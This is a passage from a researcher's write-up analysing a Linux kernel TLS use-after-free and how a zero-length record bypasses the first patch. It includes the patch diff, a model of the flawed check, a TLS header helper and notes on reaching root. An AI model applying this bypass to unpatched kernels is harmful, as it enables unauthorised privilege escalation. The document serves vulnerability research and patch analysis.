+ /* process_rx_list() will set @control if it processed any records */
copied = err;
- if (len <= copied || (copied && control != TLS_RECORD_TYPE_DATA) || rx_more)
+ if (len <= copied || rx_more ||
+ (control && control != TLS_RECORD_TYPE_DATA))
goto end;
target = sock_rcvlowat(sk, flags & MSG_WAITALL, len);
```
The previous patch can be bypassed by making `copied` equal to 0, which means sending a zero-length record. The flow then continues like the original bug: `tls_record_content_type` returns 0, and `anchor` ends up inside `rx_list`.
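
The bypass is visible when the two versions of the check from the diff are modelled side by side. A user-space sketch of just that `if` (function names are mine):

```c
#include <stdbool.h>
#include <stddef.h>

#define TLS_RECORD_TYPE_DATA 23

/* Check after the first fix: a non-DATA record only stops recvmsg()
 * if it contributed at least one byte. */
static bool stops_first_fix(size_t len, size_t copied, unsigned char control,
                            bool rx_more)
{
    return len <= copied ||
           (copied && control != TLS_RECORD_TYPE_DATA) || rx_more;
}

/* Check after the second fix: control == 0 means "no record processed",
 * so any reported non-DATA type stops recvmsg(), even with zero bytes. */
static bool stops_second_fix(size_t len, size_t copied, unsigned char control,
                             bool rx_more)
{
    return len <= copied || rx_more ||
           (control && control != TLS_RECORD_TYPE_DATA);
}
```

For a zero-length non-DATA record (`copied = 0`, `control = 100`), `stops_first_fix` returns false and the loop goes on to the next record, while `stops_second_fix` returns true.
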
On the transmit side, the kTLS wrapper doesn't allow sending records of length 0, so I don't set up kTLS encryption for transmission. Instead, I encrypt the attack record beforehand and send it as a normal TCP segment.
Of course, I didn't write my own AES_CCM_128 encryption function in C; I took the server's encrypted segment from [the test for the patch](https://lore.kernel.org/all/20250820021952.143068-2-kuba@kernel.org/).
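
Since the record goes out as raw TCP bytes, the sender has to produce the 5-byte TLS record header itself (content type, 2-byte version, 2-byte length, both big endian) in front of the pre-encrypted payload. A minimal sketch of that framing; `tls_write_header` is a hypothetical helper, and the payload bytes still have to come from a correctly encrypted record such as the one in the selftest.

```c
#include <stddef.h>
#include <stdint.h>

#define TLS_HDR_LEN 5

/* Write a TLS record header into out[0..4].
 * payload_len is the number of bytes that follow the header on the wire.
 * Returns TLS_HDR_LEN, or 0 if the buffer is too small. */
static size_t tls_write_header(uint8_t *out, size_t cap, uint8_t type,
                               uint16_t version, uint16_t payload_len)
{
    if (cap < TLS_HDR_LEN)
        return 0;
    out[0] = type;
    out[1] = (uint8_t)(version >> 8);
    out[2] = (uint8_t)(version & 0xff);
    out[3] = (uint8_t)(payload_len >> 8);
    out[4] = (uint8_t)(payload_len & 0xff);
    return TLS_HDR_LEN;
}
```

Note that a record with an empty plaintext still has a non-zero `payload_len` on the wire, because the cipher's per-record overhead is carried after the header.
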
## Useful links
* [Linux Kernel TLS Part 1 & 2 - Pumpkin (@u1f383)](https://u1f383.github.io/linux/2025/01/20/linux-kernel-tls-part-1.html)
* [Analysis of CVE-2025-37756, an UAF Vulnerability in Linux KTLS - Pumpkin (@u1f383)](https://u1f383.github.io/linux/2025/09/03/analysis-of-CVE-2025-37756-an-uaf-vulnerability-in-linux-ktls.html)
* [Kernel TLS docs](https://docs.kernel.org/networking/tls.html)
* [tools/testing/selftests/net/tls.c - utilities & example for setting up a TLS connection](https://elixir.bootlin.com/linux/v6.6/source/tools/testing/selftests/net/tls.c)
* [CVE-2024-58239 test of the patch](https://lore.kernel.org/all/018f1633d5471684c65def5fe390de3b15c3d683.1708007371.git.sd@queasysnail.net/)
* [CVE-2025-39682 test of the patch](https://lore.kernel.org/all/20250820021952.143068-2-kuba@kernel.org/)
## Thoughts
This bug really gave me the experience of doing 1-day analysis (though I think half of the process felt like 0-day analysis).
Reading the original "primitive" - `merging 2 non-DATA records` - I kept asking myself whether I was being trolled. I thought `exp401` might be someone testing their automatic form submission script, and that the CVE was in fact unexploitable. The thought didn't come from nowhere: the Linux CVE team is known for handing out CVE numbers to weird, non-dangerous bugs.
I kept the doubt in my head while trying to exploit it, telling myself "this is a troll". I was so stressed about it. That's what people experience when they do 0-day research on the Linux kernel, right? Having a bug and not knowing whether it gives a primitive strong enough for LPE.
On top of that, I was given a deadline of one month for the 1-day analysis, and I dared to choose `net/tls`, a subsystem I had never touched. I didn't even know a thing about TLS, lol.
The moment the crash popped up, I was so relieved. It took weeks to reach that point. I thought that if it was a normal UAF, one week might be enough... But a week and a half passed, and I realized it was not that easy.
The last week was full of emotions. The pipe spray method I had always trusted backfired on me; there was some unusual behavior that took me 2 days to figure out. I finished the exploit code and got root 2 hours before my deadline.